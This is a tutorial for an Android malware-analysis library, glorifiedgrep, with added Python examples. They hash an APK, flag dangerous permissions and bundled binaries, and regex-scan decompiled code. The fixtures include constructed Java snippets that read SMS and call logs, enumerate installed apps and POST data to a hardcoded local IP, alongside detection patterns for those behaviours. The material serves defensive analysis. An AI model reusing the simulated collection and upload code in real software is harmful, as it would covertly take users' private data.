Glorifiedgrep is a Python library that drives jadx and ripgrep to analyze decompiled Android code. It currently targets Python 3.7; support for other Python versions is planned. It is still in development and the API may change.
The GlorifiedAndroid class in glorifiedgrep offers more than 200 methods for Android analysis; only a few are shown here. Refer to the full documentation for the rest.
Also keep in mind that glorifiedgrep is not a vulnerability scanner: it does not decide that something is exploitable. It helps you quickly pinpoint areas of interest that should then be reviewed by hand.
Analysis
To use glorifiedgrep, we first need to instantiate the GlorifiedAndroid class.
Application hash
We can obtain the hashes of the APK, the identifiers used to look a sample up in malware databases, using:
Dangerous permissions
We can obtain a list of the dangerous permissions that are being used by the app using:
File types
Researchers have indicated that this APK is bundled with a few executables. Let's use glorifiedgrep to list all the different file types bundled with the app.
With one method call we can see the various binaries included in the app, along with the file listing the blacklisted apps.
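The three checks above (application hash, dangerous permissions, bundled file types) can also be carried out with nothing but the Python standard library. The following is an added example written for this article; it is not glorifiedgrep's code and does not use its API. It builds a throwaway APK-like zip in memory so it runs offline: the package name, manifest and file names are constructed, and the dangerous-permission set is a subset of the permissions Android places in the dangerous protection level.

```python
"""APK-level triage: hash, dangerous permissions, bundled file types.

Added example, not glorifiedgrep's own code. It builds a throwaway APK-like
zip in memory so it runs offline; the package and file names are made up.
"""
import hashlib
import io
import xml.etree.ElementTree as ET
import zipfile

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Subset of the permissions Android classifies at the "dangerous" protection level.
DANGEROUS = {
    "android.permission.READ_SMS", "android.permission.RECEIVE_SMS", "android.permission.SEND_SMS",
    "android.permission.READ_CALL_LOG", "android.permission.WRITE_CALL_LOG",
    "android.permission.READ_CALENDAR", "android.permission.WRITE_CALENDAR",
    "android.permission.READ_CONTACTS", "android.permission.WRITE_CONTACTS",
    "android.permission.READ_EXTERNAL_STORAGE", "android.permission.WRITE_EXTERNAL_STORAGE",
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.ACCESS_COARSE_LOCATION",
    "android.permission.RECORD_AUDIO", "android.permission.CAMERA", "android.permission.READ_PHONE_STATE",
}

# Constructed decoded manifest (jadx emits this text form; inside the APK it is binary XML).
MANIFEST_XML = f"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="{ANDROID_NS}" package="com.example.collector">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.READ_CALENDAR"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES"/>
</manifest>
"""

# Magic-byte signatures for the file kinds worth flagging inside an APK.
MAGIC = [
    (b"\x7fELF", "ELF executable/shared object"),
    (b"dex\n", "Dalvik DEX"),
    (b"\x89PNG", "PNG image"),
    (b"PK\x03\x04", "ZIP/JAR archive"),
    (b"#!", "script with shebang"),
]


def build_demo_apk() -> bytes:
    """Constructed APK-like zip: a dex, a bundled ELF, a shell script, a blacklist, an icon."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 64)
        z.writestr("assets/busybox", b"\x7fELF\x01\x01\x01" + b"\x00" * 64)
        z.writestr("assets/run.sh", b"#!/system/bin/sh\n./busybox ps\n")
        z.writestr("assets/blacklist.txt", b"com.antivirus.one\ncom.antivirus.two\n")
        z.writestr("res/drawable/icon.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    return buf.getvalue()


def apk_hashes(apk: bytes) -> dict:
    """MD5/SHA-1/SHA-256 of the APK bytes, the identifiers used to look a sample up."""
    return {name: hashlib.new(name, apk).hexdigest() for name in ("md5", "sha1", "sha256")}


def dangerous_permissions(manifest_xml: str) -> list:
    """Requested <uses-permission> names that fall in the dangerous set."""
    root = ET.fromstring(manifest_xml)
    requested = [p.get(f"{{{ANDROID_NS}}}name") for p in root.iter("uses-permission")]
    return sorted(p for p in requested if p in DANGEROUS)


def file_types(apk: bytes) -> dict:
    """{entry name: detected type}, decided from the first bytes of each zip entry."""
    out = {}
    with zipfile.ZipFile(io.BytesIO(apk)) as z:
        for info in z.infolist():
            with z.open(info) as f:
                head = f.read(8)
            out[info.filename] = next((label for sig, label in MAGIC if head.startswith(sig)), "data/text")
    return out


def bundled_executables(apk: bytes) -> list:
    """Entries that are native binaries or scripts, the things to pull out and inspect first."""
    return sorted(n for n, t in file_types(apk).items() if t.startswith(("ELF", "script")))


if __name__ == "__main__":
    sample = build_demo_apk()
    print(apk_hashes(sample))
    print(dangerous_permissions(MANIFEST_XML))
    print(file_types(sample))
    print(bundled_executables(sample))
```

Detection here relies on magic bytes rather than file extensions, because a bundled ELF is often stored under a neutral name in assets/ (the constructed busybox above has no extension at all). The permission check only answers "does the manifest request it"; whether the app actually exercises the permission is a question for the code-level searches that follow.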
Executing shell commands
Instead of calling native code through JNI, the application executes some of the pre-packaged binaries directly in a shell. We can see instances of shell execution using:
Reading sensitive information
Researchers have also indicated that the application reads various kinds of sensitive user information, including SMS messages, calendar entries and call logs. On Android this data is usually obtained from content providers, queried through a ContentResolver with a content:// URI. glorifiedgrep offers a handy method that collects the content URIs referenced in the code. Using a little list comprehension, let's gather all the content providers this application touches. We will also restrict the analysis to app code, leaving out bundled framework and library packages.
Application queries for installed packages
The Android SDK's PackageManager class and its getInstalledPackages method let an app enumerate the applications installed on a device. We can find those calls using:
Application makes POST requests
Researchers have indicated that this application POSTs all the enumerated data to a remote endpoint. We can find the POST requests using:
Hardcoded IP address
We know that the application tries to send the data to a local 192.x.x.x address. We can find the hardcoded IP addresses using:
Environment variables
We can also see that the application saves its data to external storage. One way to spot this is to check which environment variables it reads, since Android exposes the external storage path through the EXTERNAL_STORAGE variable.
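The code-level checks in the sections above (shell execution, content resolver URIs restricted to app code, getInstalledPackages, POST requests, hardcoded IP addresses, environment variables) all reduce to regex searches over the jadx output tree, which is what ripgrep does underneath glorifiedgrep. The following added example, which is not glorifiedgrep's own code and does not use its API, implements that pass in plain Python over a constructed stand-in for a decompiled tree; the package names, file paths and Java snippets are made up for the demo.

```python
"""Regex triage of jadx-decompiled sources.

Added example (not glorifiedgrep's own code): mirrors what a ripgrep-driven
pass over jadx output does for the indicators discussed above. The decompiled
snippets below are constructed for the demo; the package names are made up.
"""
import ipaddress
import re
from collections import defaultdict

# Constructed stand-in for a jadx output tree: {relative path: source text}.
DECOMPILED = {
    "sources/com/example/collector/Worker.java": """\
public class Worker {
    void run(Context ctx) {
        Runtime.getRuntime().exec("/data/data/com.example.collector/files/busybox ps");
        Cursor sms = ctx.getContentResolver().query(Uri.parse("content://sms/inbox"), null, null, null, null);
        Cursor calls = ctx.getContentResolver().query(Uri.parse("content://call_log/calls"), null, null, null, null);
        List<PackageInfo> pkgs = ctx.getPackageManager().getInstalledPackages(0);
        String out = System.getenv("EXTERNAL_STORAGE") + "/.cache/dump.db";
    }
}
""",
    "sources/com/example/collector/Uploader.java": """\
public class Uploader {
    static final String ENDPOINT = "http://192.168.1.10:8080/upload";
    void send(byte[] body) throws IOException {
        HttpURLConnection conn = (HttpURLConnection) new URL(ENDPOINT).openConnection();
        conn.setRequestMethod("POST");
        conn.getOutputStream().write(body);
    }
}
""",
    # Framework/library code that an "app code only" run should skip.
    "sources/androidx/core/content/ContextCompat.java": """\
public class ContextCompat {
    static Cursor q(ContentResolver r) { return r.query(Uri.parse("content://media/external"), null, null, null, null); }
}
""",
}

# Path prefixes treated as framework/third-party code rather than app code.
LIBRARY_PREFIXES = ("sources/android/", "sources/androidx/", "sources/com/google/",
                    "sources/kotlin/", "sources/okhttp3/")

# One pattern per area of interest. These are indicators to review, not findings.
PATTERNS = {
    "shell_exec": re.compile(r"Runtime\.getRuntime\(\)\.exec\(|new\s+ProcessBuilder\("),
    "content_uri": re.compile(r'"(content://[^"]+)"'),
    "installed_packages": re.compile(r"\.getInstalledPackages\(|\.getInstalledApplications\("),
    "http_post": re.compile(r'setRequestMethod\(\s*"POST"\s*\)'),
    # Dotted quads; version strings can false-positive, so callers validate with ipaddress.
    "ipv4_literal": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "env_var": re.compile(r'System\.getenv\(\s*"([^"]+)"\s*\)'),
}


def is_app_code(path: str) -> bool:
    """True unless the file sits under a known framework/library package."""
    return not path.startswith(LIBRARY_PREFIXES)


def scan(tree: dict, app_code_only: bool = True) -> dict:
    """Return {category: [(path, line_no, matched_text), ...]} over the tree."""
    hits = defaultdict(list)
    for path, source in tree.items():
        if app_code_only and not is_app_code(path):
            continue
        for lineno, line in enumerate(source.splitlines(), start=1):
            for name, rx in PATTERNS.items():
                for m in rx.finditer(line):
                    # Keep the capture group (URI / env var name) when the pattern has one.
                    text = m.group(1) if m.groups() else m.group(0)
                    hits[name].append((path, lineno, text))
    return dict(hits)


def content_uris(tree: dict, app_code_only: bool = True) -> list:
    """Sorted unique content:// URIs, the list-comprehension step from the text."""
    return sorted({text for _, _, text in scan(tree, app_code_only).get("content_uri", [])})


def private_ips(tree: dict) -> list:
    """Hardcoded IPv4 literals that are valid addresses in RFC 1918 space."""
    found = set()
    for _, _, text in scan(tree).get("ipv4_literal", []):
        try:
            ip = ipaddress.ip_address(text)
        except ValueError:  # e.g. 999.1.1.1, a dotted quad that is not an address
            continue
        if ip.is_private:
            found.add(str(ip))
    return sorted(found)


if __name__ == "__main__":
    for category, rows in scan(DECOMPILED).items():
        print(category, rows)
    print("content URIs:", content_uris(DECOMPILED))
    print("private IPs:", private_ips(DECOMPILED))
```

Two design points carry over to real trees. First, the app-code filter is a path prefix check, so bundled libraries (androidx, OkHttp, Google Play services) stop flooding the results; run with app_code_only=False when you want to see what the libraries themselves touch. Second, every hit records the file and line, which is what lets you jump straight from an indicator to the decompiled method that needs a manual read.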
Conclusion
As we can see, glorifiedgrep lets us run a variety of Android application analyses very quickly.